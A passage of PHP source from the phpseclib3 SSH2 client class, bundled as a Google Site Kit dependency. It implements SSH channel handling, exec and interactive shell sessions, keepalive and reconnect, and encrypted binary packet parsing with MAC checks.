(!$this->get_channel_packet(self::CHANNEL_EXEC)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to request pseudo-terminal'); } } // sending a pty-req SSH_MSG_CHANNEL_REQUEST message is unnecessary and, in fact, in most cases, slows things // down. the one place where it might be desirable is if you're doing something like \phpseclib3\Net\SSH2::exec('ping localhost &'). // with a pty-req SSH_MSG_CHANNEL_REQUEST, exec() will return immediately and the ping process will then // then immediately terminate. without such a request exec() will loop indefinitely. the ping process won't end but // neither will your script. // although, in theory, the size of SSH_MSG_CHANNEL_REQUEST could exceed the maximum packet size established by // SSH_MSG_CHANNEL_OPEN_CONFIRMATION, RFC4254#section-5.1 states that the "maximum packet size" refers to the // "maximum size of an individual data packet". ie. SSH_MSG_CHANNEL_DATA. RFC4254#section-5.2 corroborates. $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_EXEC], 'exec', 1, $command); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_EXEC)) { return \false; } $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_DATA; if ($this->request_pty === \true) { $this->channel_id_last_interactive = self::CHANNEL_EXEC; return \true; } $output = ''; while (\true) { $temp = $this->get_channel_packet(self::CHANNEL_EXEC); switch (\true) { case $temp === \true: return \is_callable($callback) ? \true : $output; case $temp === \false: return \false; default: if (\is_callable($callback)) { if ($callback($temp) === \true) { $this->close_channel(self::CHANNEL_EXEC); return \true; } } else { $output .= $temp; } } } } /** * How many channels are currently open? * * @return int */ public function getOpenChannelCount() { return $this->channelCount; } /** * Opens a channel * * @param string $channel * @param bool $skip_extended * @return bool */ protected function open_channel($channel, $skip_extended = \false) { if (isset($this->channel_status[$channel]) && $this->channel_status[$channel] != NET_SSH2_MSG_CHANNEL_CLOSE) { throw new \RuntimeException('Please close the channel (' . $channel . ') before trying to open it again'); } $this->channelCount++; if ($this->channelCount > 1 && $this->errorOnMultipleChannels) { throw new \RuntimeException("Ubuntu's OpenSSH from 5.8 to 6.9 doesn't work with multiple channels"); } // RFC4254 defines the (client) window size as "bytes the other party can send before it must wait for the window to // be adjusted". 0x7FFFFFFF is, at 2GB, the max size. technically, it should probably be decremented, but, // honestly, if you're transferring more than 2GB, you probably shouldn't be using phpseclib, anyway. // see http://tools.ietf.org/html/rfc4254#section-5.2 for more info $this->window_size_server_to_client[$channel] = $this->window_size; // 0x8000 is the maximum max packet size, per http://tools.ietf.org/html/rfc4253#section-6.1, although since PuTTy // uses 0x4000, that's what will be used here, as well. $packet_size = 0x4000; $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CsN3', NET_SSH2_MSG_CHANNEL_OPEN, 'session', $channel, $this->window_size_server_to_client[$channel], $packet_size); $this->send_binary_packet($packet); $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_OPEN; return $this->get_channel_packet($channel, $skip_extended); } /** * Creates an interactive shell * * Returns bool(true) if the shell was opened. * Returns bool(false) if the shell was already open. * * @see self::isShellOpen() * @see self::read() * @see self::write() * @return bool * @throws InsufficientSetupException if not authenticated * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ public function openShell() { if (!$this->isAuthenticated()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Operation disallowed prior to login()'); } $this->open_channel(self::CHANNEL_SHELL); $terminal_modes = \pack('C', NET_SSH2_TTY_OP_END); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2( 'CNsbsN4s', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SHELL], 'pty-req', \true, // want reply $this->term, $this->windowColumns, $this->windowRows, 0, 0, $terminal_modes ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_SHELL] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_SHELL)) { throw new \RuntimeException('Unable to request pty'); } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsb', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SHELL], 'shell', \true); $this->send_binary_packet($packet); $response = $this->get_channel_packet(self::CHANNEL_SHELL); if ($response === \false) { throw new \RuntimeException('Unable to request shell'); } $this->channel_status[self::CHANNEL_SHELL] = NET_SSH2_MSG_CHANNEL_DATA; $this->channel_id_last_interactive = self::CHANNEL_SHELL; $this->bitmap |= self::MASK_SHELL; return \true; } /** * Return the channel to be used with read(), write(), and reset(), if none were specified * @deprecated for lack of transparency in intended channel target, to be potentially replaced * with method which guarantees open-ness of all yielded channels and throws * error for multiple open channels * @see self::read() * @see self::write() * @return int */ private function get_interactive_channel() { switch (\true) { case $this->is_channel_status_data(self::CHANNEL_SUBSYSTEM): return self::CHANNEL_SUBSYSTEM; case $this->is_channel_status_data(self::CHANNEL_EXEC): return self::CHANNEL_EXEC; default: return self::CHANNEL_SHELL; } } /** * Indicates the DATA status on the given channel * * @param int $channel The channel number to evaluate * @return bool */ private function is_channel_status_data($channel) { return isset($this->channel_status[$channel]) && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA; } /** * Return an available open channel * * @return int */ private function get_open_channel() { $channel = self::CHANNEL_EXEC; do { if (isset($this->channel_status[$channel]) && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_OPEN) { return $channel; } } while ($channel++ < self::CHANNEL_SUBSYSTEM); return \false; } /** * Request agent forwarding of remote server * * @return bool */ public function requestAgentForwarding() { $request_channel = $this->get_open_channel(); if ($request_channel === \false) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsC', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[$request_channel], 'auth-agent-req@openssh.com', 1); $this->channel_status[$request_channel] = NET_SSH2_MSG_CHANNEL_REQUEST; $this->send_binary_packet($packet); if (!$this->get_channel_packet($request_channel)) { return \false; } $this->channel_status[$request_channel] = NET_SSH2_MSG_CHANNEL_OPEN; return \true; } /** * Returns the output of an interactive shell * * Returns when there's a match for $expect, which can take the form of a string literal or, * if $mode == self::READ_REGEX, a regular expression. * * If not specifying a channel, an open interactive channel will be selected, or, if there are * no open channels, an interactive shell will be created. If there are multiple open * interactive channels, a legacy behavior will apply in which channel selection prioritizes * an active subsystem, the exec pty, and, lastly, the shell. If using multiple interactive * channels, callers are discouraged from relying on this legacy behavior and should specify * the intended channel. * * @see self::write() * @param string $expect * @param int $mode One of the self::READ_* constants * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return string|bool|null * @throws \RuntimeException on connection error * @throws InsufficientSetupException on unexpected channel status, possibly due to closure */ public function read($expect = '', $mode = self::READ_SIMPLE, $channel = null) { if (!$this->isAuthenticated()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Operation disallowed prior to login()'); } $this->curTimeout = $this->timeout; $this->is_timeout = \false; if ($channel === null) { $channel = $this->get_interactive_channel(); } if (!$this->is_channel_status_data($channel) && empty($this->channel_buffers[$channel])) { if ($channel != self::CHANNEL_SHELL) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Data is not available on channel'); } elseif (!$this->openShell()) { throw new \RuntimeException('Unable to initiate an interactive shell session'); } } if ($mode == self::READ_NEXT) { return $this->get_channel_packet($channel); } $match = $expect; while (\true) { if ($mode == self::READ_REGEX) { \preg_match($expect, \substr($this->interactiveBuffer, -1024), $matches); $match = isset($matches[0]) ? $matches[0] : ''; } $pos = \strlen($match) ? \strpos($this->interactiveBuffer, $match) : \false; if ($pos !== \false) { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->interactiveBuffer, $pos + \strlen($match)); } $response = $this->get_channel_packet($channel); if ($response === \true) { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->interactiveBuffer, \strlen($this->interactiveBuffer)); } $this->interactiveBuffer .= $response; } } /** * Inputs a command into an interactive shell. * * If not specifying a channel, an open interactive channel will be selected, or, if there are * no open channels, an interactive shell will be created. If there are multiple open * interactive channels, a legacy behavior will apply in which channel selection prioritizes * an active subsystem, the exec pty, and, lastly, the shell. If using multiple interactive * channels, callers are discouraged from relying on this legacy behavior and should specify * the intended channel. * * @see SSH2::read() * @param string $cmd * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return void * @throws \RuntimeException on connection error * @throws InsufficientSetupException on unexpected channel status, possibly due to closure * @throws TimeoutException if the write could not be completed within the requested self::setTimeout() */ public function write($cmd, $channel = null) { if (!$this->isAuthenticated()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Operation disallowed prior to login()'); } if ($channel === null) { $channel = $this->get_interactive_channel(); } if (!$this->is_channel_status_data($channel)) { if ($channel != self::CHANNEL_SHELL) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Data is not available on channel'); } elseif (!$this->openShell()) { throw new \RuntimeException('Unable to initiate an interactive shell session'); } } $this->curTimeout = $this->timeout; $this->is_timeout = \false; $this->send_channel_packet($channel, $cmd); } /** * Start a subsystem. * * Right now only one subsystem at a time is supported. To support multiple subsystem's stopSubsystem() could accept * a string that contained the name of the subsystem, but at that point, only one subsystem of each type could be opened. * To support multiple subsystem's of the same name maybe it'd be best if startSubsystem() generated a new channel id and * returns that and then that that was passed into stopSubsystem() but that'll be saved for a future date and implemented * if there's sufficient demand for such a feature. * * @see self::stopSubsystem() * @param string $subsystem * @return bool */ public function startSubsystem($subsystem) { $this->open_channel(self::CHANNEL_SUBSYSTEM); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SUBSYSTEM], 'subsystem', 1, $subsystem); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_SUBSYSTEM] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_SUBSYSTEM)) { return \false; } $this->channel_status[self::CHANNEL_SUBSYSTEM] = NET_SSH2_MSG_CHANNEL_DATA; $this->channel_id_last_interactive = self::CHANNEL_SUBSYSTEM; return \true; } /** * Stops a subsystem. * * @see self::startSubsystem() * @return bool */ public function stopSubsystem() { if ($this->isInteractiveChannelOpen(self::CHANNEL_SUBSYSTEM)) { $this->close_channel(self::CHANNEL_SUBSYSTEM); } return \true; } /** * Closes a channel * * If read() timed out you might want to just close the channel and have it auto-restart on the next read() call * * If not specifying a channel, an open interactive channel will be selected. If there are * multiple open interactive channels, a legacy behavior will apply in which channel selection * prioritizes an active subsystem, the exec pty, and, lastly, the shell. If using multiple * interactive channels, callers are discouraged from relying on this legacy behavior and * should specify the intended channel. * * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return void */ public function reset($channel = null) { if ($channel === null) { $channel = $this->get_interactive_channel(); } if ($this->isInteractiveChannelOpen($channel)) { $this->close_channel($channel); } } /** * Is timeout? * * Did exec() or read() return because they timed out or because they encountered the end? * */ public function isTimeout() { return $this->is_timeout; } /** * Disconnect * */ public function disconnect() { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); if (isset($this->realtime_log_file) && \is_resource($this->realtime_log_file)) { \fclose($this->realtime_log_file); } unset(self::$connections[$this->getResourceId()]); } /** * Destructor. * * Will be called, automatically, if you're supporting just PHP5. If you're supporting PHP4, you'll need to call * disconnect(). * */ public function __destruct() { $this->disconnect(); } /** * Is the connection still active? * * $level has 3x possible values: * 0 (default): phpseclib takes a passive approach to see if the connection is still active by calling feof() * on the socket * 1: phpseclib takes an active approach to see if the connection is still active by sending an SSH_MSG_IGNORE * packet that doesn't require a response * 2: phpseclib takes an active approach to see if the connection is still active by sending an SSH_MSG_CHANNEL_OPEN * packet and imediately trying to close that channel. some routers, in particular, however, will only let you * open one channel, so this approach could yield false positives * * @param int $level * @return bool */ public function isConnected($level = 0) { if (!\is_int($level) || $level < 0 || $level > 2) { throw new \InvalidArgumentException('$level must be 0, 1 or 2'); } if ($level == 0) { return $this->bitmap & self::MASK_CONNECTED && \is_resource($this->fsock) && !\feof($this->fsock); } try { if ($level == 1) { $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_IGNORE, 0)); } else { $this->open_channel(self::CHANNEL_KEEP_ALIVE); $this->close_channel(self::CHANNEL_KEEP_ALIVE); } return \true; } catch (\Exception $e) { return \false; } } /** * Have you successfully been logged in? * * @return bool */ public function isAuthenticated() { return (bool) ($this->bitmap & self::MASK_LOGIN); } /** * Is the interactive shell active? * * @return bool */ public function isShellOpen() { return $this->isInteractiveChannelOpen(self::CHANNEL_SHELL); } /** * Is the exec pty active? * * @return bool */ public function isPTYOpen() { return $this->isInteractiveChannelOpen(self::CHANNEL_EXEC); } /** * Is the given interactive channel active? * * @param int $channel Channel id returned by self::getInteractiveChannelId() * @return bool */ public function isInteractiveChannelOpen($channel) { return $this->isAuthenticated() && $this->is_channel_status_data($channel); } /** * Returns a channel identifier, presently of the last interactive channel opened, regardless of current status. * Returns 0 if no interactive channel has been opened. * * @see self::isInteractiveChannelOpen() * @return int */ public function getInteractiveChannelId() { return $this->channel_id_last_interactive; } /** * Pings a server connection, or tries to reconnect if the connection has gone down * * Inspired by http://php.net/manual/en/mysqli.ping.php * * @return bool */ public function ping() { if (!$this->isAuthenticated()) { if (!empty($this->auth)) { return $this->reconnect(); } return \false; } try { $this->open_channel(self::CHANNEL_KEEP_ALIVE); } catch (\RuntimeException $e) { return $this->reconnect(); } $this->close_channel(self::CHANNEL_KEEP_ALIVE); return \true; } /** * In situ reconnect method * * @return boolean */ private function reconnect() { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); $this->connect(); foreach ($this->auth as $auth) { $result = $this->login(...$auth); } return $result; } /** * Resets a connection for re-use */ protected function reset_connection() { if (\is_resource($this->fsock) && \get_resource_type($this->fsock) === 'stream') { \fclose($this->fsock); } $this->fsock = null; $this->bitmap = 0; $this->binary_packet_buffer = null; $this->decrypt = $this->encrypt = \false; $this->decrypt_block_size = $this->encrypt_block_size = 8; $this->hmac_check = $this->hmac_create = \false; $this->hmac_size = \false; $this->session_id = \false; $this->last_packet = null; $this->get_seq_no = $this->send_seq_no = 0; $this->channel_status = []; $this->channel_id_last_interactive = 0; $this->channel_buffers = []; $this->channel_buffers_write = []; } /** * @return int[] second and microsecond stream timeout options based on user-requested timeout and keep-alive, or the default socket timeout by default, which mirrors PHP socket streams. */ private function get_stream_timeout() { $sec = \ini_get('default_socket_timeout'); $usec = 0; if ($this->curTimeout > 0) { $sec = (int) \floor($this->curTimeout); $usec = (int) (1000000 * ($this->curTimeout - $sec)); } if ($this->keepAlive > 0) { $elapsed = \microtime(\true) - $this->last_packet; $timeout = \max($this->keepAlive - $elapsed, 0); if (!$this->curTimeout || $timeout < $this->curTimeout) { $sec = (int) \floor($timeout); $usec = (int) (1000000 * ($timeout - $sec)); } } return [$sec, $usec]; } /** * Retrieves the next packet with added timeout and type handling * * @param string $message_types Message types to enforce in response, closing if not met * @return string * @throws ConnectionClosedException If an error has occurred preventing read of the next packet */ private function get_binary_packet_or_close(...$message_types) { try { $packet = $this->get_binary_packet(); if (\count($message_types) > 0 && !\in_array(\ord($packet[0]), $message_types)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Bad message type. Expected: #' . \implode(', #', $message_types) . '. Got: #' . \ord($packet[0])); } return $packet; } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\TimeoutException $e) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed due to timeout'); } } /** * Gets Binary Packets * * See '6. Binary Packet Protocol' of rfc4253 for more info. * * @see self::_send_binary_packet() * @return string * @throws TimeoutException If user requested timeout was reached while waiting for next packet * @throws ConnectionClosedException If an error has occurred preventing read of the next packet */ private function get_binary_packet() { if (!\is_resource($this->fsock)) { throw new \InvalidArgumentException('fsock is not a resource.'); } if (!$this->keyExchangeInProgress && \count($this->kex_buffer)) { return $this->filter(\array_shift($this->kex_buffer)); } if ($this->binary_packet_buffer == null) { // buffer the packet to permit continued reads across timeouts $this->binary_packet_buffer = (object) [ 'read_time' => 0, // the time to read the packet from the socket 'raw' => '', // the raw payload read from the socket 'plain' => '', // the packet in plain text, excluding packet_length header 'packet_length' => null, // the packet_length value pulled from the payload 'size' => $this->decrypt_block_size, ]; } $packet = $this->binary_packet_buffer; while (\strlen($packet->raw) < $packet->size) { if (\feof($this->fsock)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed by server'); } if ($this->curTimeout < 0) { $this->is_timeout = \true; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\TimeoutException('Timed out waiting for server'); } $this->send_keep_alive(); list($sec, $usec) = $this->get_stream_timeout(); \stream_set_timeout($this->fsock, $sec, $usec); $start = \microtime(\true); $raw = \stream_get_contents($this->fsock, $packet->size - \strlen($packet->raw)); $elapsed = \microtime(\true) - $start; $packet->read_time += $elapsed; if ($this->curTimeout > 0) { $this->curTimeout -= $elapsed; } if ($raw === \false) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed by server'); } elseif (!\strlen($raw)) { continue; } $packet->raw .= $raw; if (!$packet->packet_length) { $this->get_binary_packet_size($packet); } } if (\strlen($packet->raw) != $packet->size) { throw new \RuntimeException('Size of packet was not expected length'); } // destroy buffer as packet represents the entire payload and should be processed in full $this->binary_packet_buffer = null; // copy the raw payload, so as not to destroy original $raw = $packet->raw; if ($this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash) { $hmac = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($raw, $this->hmac_size); } $packet_length_header_size = 4; if ($this->decrypt) { switch ($this->decryptName) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $this->decrypt->setNonce($this->decryptFixedPart . $this->decryptInvocationCounter); \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::increment_str($this->decryptInvocationCounter); $this->decrypt->setAAD(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($raw, $packet_length_header_size)); $this->decrypt->setTag(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($raw, $this->decrypt_block_size)); $packet->plain = $this->decrypt->decrypt($raw); break; case 'chacha20-poly1305@openssh.com': // This should be impossible, but we are checking anyway to narrow the type for Psalm. if (!$this->decrypt instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20) { throw new \LogicException('$this->decrypt is not a ' . \Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20::class); } $this->decrypt->setNonce(\pack('N2', 0, $this->get_seq_no)); $this->decrypt->setCounter(0); // this is the same approach that's implemented in Salsa20::createPoly1305Key() // but we don't want to use the same AEAD construction that RFC8439 describes // for ChaCha20-Poly1305 so we won't rely on it (see Salsa20::poly1305()) $this->decrypt->setPoly1305Key($this->decrypt->encrypt(\str_repeat("\x00", 32))); $this->decrypt->setAAD(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($raw, $packet_length_header_size)); $this->decrypt->setCounter(1); $this->decrypt->setTag(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($raw, 16)); $packet->plain = $this->decrypt->decrypt($raw); break; default: if (!$this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash || !$this->hmac_check_etm) { // first block was already decrypted for contained packet_length header \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($raw, $this->decrypt_block_size); if (\strlen($raw) > 0) { $packet->plain .= $this->decrypt->decrypt($raw); } } else { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($raw, $packet_length_header_size); $packet->plain = $this->decrypt->decrypt($raw); } break; } } else { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($raw, $packet_length_header_size); $packet->plain = $raw; } if ($this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash) { $reconstructed = !$this->hmac_check_etm ? \pack('Na*', $packet->packet_length, $packet->plain) : \substr($packet->raw, 0, -$this->hmac_size); if (($this->hmac_check->getHash() & "\xff\xff\xff\xff") == 'umac') { $this->hmac_check->setNonce("\x00\x00\x00\x00" . \pack('N', $this->get_seq_no)); if ($hmac != $this->hmac_check->hash($reconstructed)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_MAC_ERROR); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Invalid UMAC'); } } else { if ($hmac != $this->hmac_check->hash(\pack('Na*', $this->get_seq_no, $reconstructed))) { $this->disconnect_helper(NET_SSH2_DISCONNECT_MAC_ERROR); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Invalid HMAC'); } } } $padding_length = 0; $payload = $packet->plain; \extract(\unpack('Cpadding_length', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1))); if ($padding_length > 0) { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($payload, $padding_length); } if (!$this->keyExchangeInProgress) { $this->bytesTransferredSinceLastKEX += $packet->packet_length + $padding_length + 5; } if (empty($payload)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Plaintext is too short'); } switch ($this->decompress) { case self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH: if (!$this->isAuthenticated()) { break; } // fall-through case self::NET_SSH2_COMPRESSION_ZLIB: if ($this->regenerate_decompression_context) { $this->regenerate_decompression_context = \false; $cmf = \ord($payload[0]); $cm = $cmf & 0xf; if ($cm != 8) { // deflate throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException("Only CM = 8 ('deflate') is supported ({$cm})"); } $cinfo = ($cmf & 0xf0) >> 4; if ($cinfo > 7) { throw new \RuntimeException("CINFO above 7 is not allowed ({$cinfo})"); } $windowSize = 1 << $cinfo + 8; $flg = \ord($payload[1]); //$fcheck = $flg && 0x0F; if (($cmf << 8 | $flg) % 31) { throw new \RuntimeException('fcheck failed'); } $fdict = \boolval($flg & 0x20); $flevel = ($flg & 0xc0) >> 6; $this->decompress_context = \inflate_init(\ZLIB_ENCODING_RAW, ['window' => $cinfo + 8]); $payload = \substr($payload, 2); } if ($this->decompress_context) { $payload = \inflate_add($this->decompress_context, $payload, \ZLIB_PARTIAL_FLUSH); } } $this->get_seq_no++; if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $current = \microtime(\true); $message_number = isset(self::$message_numbers[\ord($payload[0])]) ? self::$message_numbers[\ord($payload[0])] : 'UNKNOWN (' . \ord($payload[0]) . ')'; $message_number = '<- ' . $message_number . ' (since last: ' . \round($current - $this->last_packet, 4) . ', network: ' . \round($packet->read_time, 4) . 's)'; $this->append_log($message_number, $payload); } $this->last_packet = \microtime(\true); if ($this->bytesTransferredSinceLastKEX > $this->doKeyReexchangeAfterXBytes) { $this->key_exchange(); } // don't filter if we're in the middle of a key exchange (since _filter might send out packets) return $this->keyExchangeInProgress ? $payload : $this->filter($payload); } /** * @param object $packet The packet object being constructed, passed by reference * The size, packet_length, and plain properties of this object may be modified in processing * @throws InvalidPacketLengthException if the packet length header is invalid */ private function get_binary_packet_size(&$packet) { $packet_length_header_size = 4; if (\strlen($packet->raw) < $packet_length_header_size) { return; } $packet_length = 0; $added_validation_length = 0; // indicates when the packet length header is included when validating packet length against block size if ($this->decrypt) { switch ($this->decryptName) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': \extract(\unpack('Npacket_length', \substr($packet->raw, 0, $packet_length_header_size))); $packet->size = $packet_length_header_size + $packet_length + $this->decrypt_block_size; // expect tag break; case 'chacha20-poly1305@openssh.com': $this->lengthDecrypt->setNonce(\pack('N2', 0, $this->get_seq_no)); $packet_length_header = $this->lengthDecrypt->decrypt(\substr($packet->raw, 0, $packet_length_header_size)); \extract(\unpack('Npacket_length', $packet_length_header)); $packet->size = $packet_length_header_size + $packet_length + 16; // expect tag break; default: if (!$this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash || !$this->hmac_check_etm) { if (\strlen($packet->raw) < $this->decrypt_block_size) { return; } $packet->plain = $this->decrypt->decrypt(\substr($packet->raw, 0, $this->decrypt_block_size)); \extract(\unpack('Npacket_length', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($packet->plain, $packet_length_header_size))); $packet->size = $packet_length_header_size + $packet_length; $added_validation_length = $packet_length_header_size; } else { \extract(\unpack('Npacket_length', \substr($packet->raw, 0, $packet_length_header_size))); $packet->size = $packet_length_header_size + $packet_length; } break; } } else { \extract(\unpack('Npacket_length', \substr($packet->raw, 0, $packet_length_header_size))); $packet->size = $packet_length_header_size + $packet_length; $added_validation_length = $packet_length_header_size; } // quoting <http://tools.ietf.org/html/rfc4253#section-6.1>, // "implementations SHOULD check that the packet length is reasonable" // PuTTY uses 0x9000 as the actual max packet size and so to shall we if ($packet_length <= 0 || $packet_length > 0x9000 || ($packet_length + $added_validation_length) % $this->decrypt_block_size != 0) { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InvalidPacketLengthException('Invalid packet length'); } if ($this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash) { $packet->size += $this->hmac_size; } $packet->packet_length = $packet_length; } /** * Handle Disconnect * * Because some binary packets need to be ignored... * * @see self::filter() * @see self::key_exchange() * @return boolean * @access private */ private function handleDisconnect($payload) { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1); list($reason_code, $message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Ns', $payload); $this->errors[] = 'SSH_MSG_DISCONNECT: ' . self::$disconnect_reasons[$reason_code] . "\r\n{$message}"; $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed by server'); } /** * Filter Binary Packets * * Because some binary packets need to be ignored... * * @see self::_get_binary_packet() * @param string $payload * @return string */ private function filter($payload) { switch (\ord($payload[0])) { case NET_SSH2_MSG_DISCONNECT: return $this->handleDisconnect($payload); case NET_SSH2_MSG_IGNORE: $payload = $this->get_binary_packet(); break; case NET_SSH2_MSG_DEBUG: \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 2); // second byte is "always_display" list($message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $payload); $this->errors[] = "SSH_MSG_DEBUG: {$message}"; $payload = $this->get_binary_packet(); break; case NET_SSH2_MSG_UNIMPLEMENTED: break; // return payload case NET_SSH2_MSG_KEXINIT: // this is here for server initiated key re-exchanges after the initial key exchange if ($this->session_id !== \false) { if (!$this->key_exchange($payload)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Key exchange failed'); } $payload = $this->get_binary_packet(); } break; case NET_SSH2_MSG_EXT_INFO: \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1); list($nr_extensions) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $payload); for ($i = 0; $i < $nr_extensions; $i++) { list($extension_name, $extension_value) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $payload); if ($extension_name == 'server-sig-algs') { $this->supported_private_key_algorithms = \explode(',', $extension_value); } } $payload = $this->get_binary_packet(); } // see http://tools.ietf.org/html/rfc4252#section-5.4; only called when the encryption has been activated and when we haven't already logged in if ($this->bitmap & self::MASK_CONNECTED && !$this->isAuthenticated() && \ord($payload[0]) == NET_SSH2_MSG_USERAUTH_BANNER) { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1); list($this->banner_message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $payload); $payload = $this->get_binary_packet(); } // only called when we've already logged in if ($this->bitmap & self::MASK_CONNECTED && $this->isAuthenticated()) { switch (\ord($payload[0])) { case NET_SSH2_MSG_CHANNEL_REQUEST: if (\strlen($payload) == 31) { \extract(\unpack('cpacket_type/Nchannel/Nlength', $payload)); if (\substr($payload, 9, $length) == 'keepalive@openssh.com' && isset($this->server_channels[$channel])) { if (\ord(\substr($payload, 9 + $length))) { // want reply $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_SUCCESS, $this->server_channels[$channel])); } $payload = $this->get_binary_packet(); } } break; case 